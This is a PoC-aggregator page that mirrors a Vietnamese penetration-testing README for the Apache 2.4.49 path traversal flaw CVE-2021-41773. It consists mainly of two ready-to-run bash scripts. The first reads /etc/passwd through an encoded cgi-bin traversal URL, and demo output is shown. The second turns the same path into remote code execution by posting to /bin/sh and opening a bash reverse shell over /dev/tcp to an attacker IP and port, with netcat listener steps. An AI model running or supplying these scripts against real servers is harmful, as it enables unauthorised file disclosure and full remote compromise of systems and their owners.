CVE-2021-41773 PoC — Apache HTTP Server 路径遍历漏洞

来源

https://github.com/khaidtraivch/CVE-2021-41773-Apache-2.4.49-

关联漏洞

标题:Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
Description:Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞，攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。

Description

Kiểm thử xâm nhập

介绍

# CVE-2021-41773-Apache-2.4.49-
Kiểm thử xâm nhập 

1.1. Path Traversal (Đọc tệp /etc/passwd)
#!/bin/bash
# Script: exploit_path_traversal.sh
# Mục tiêu: Đọc tệp /etc/passwd từ Apache 2.4.49

TARGET_IP="128.0.0.100"
URL="http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

echo "[+] Khai thác Path Traversal trên Apache 2.4.49..."
curl -s "$URL" | head -n 5  # Hiển thị 5 dòng đầu của /etc/passwd

# Kết quả demo:
$ ./exploit_path_traversal.sh
[+] Khai thác Path Traversal trên Apache 2.4.49...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

1.2. Remote Code Execution (Reverse Shell)
#!/bin/bash
# Script: exploit_apache_rce.sh
# Mục tiêu: Thực thi lệnh reverse shell qua CGI

TARGET_IP="128.0.0.100"
ATTACKER_IP="192.168.0.101"
PORT="4444"

echo "[+] Gửi reverse shell đến $ATTACKER_IP:$PORT..."
curl -X POST \
  "http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "echo; bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$PORT 0>&1'"

# Cách sử dụng:

# 1.Mở Netcat để lắng nghe:
nc -lvnp 4444
# 2. Chạy script:
./exploit_apache_rce.sh

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2021-41773 PoC — Apache HTTP Server 路径遍历漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！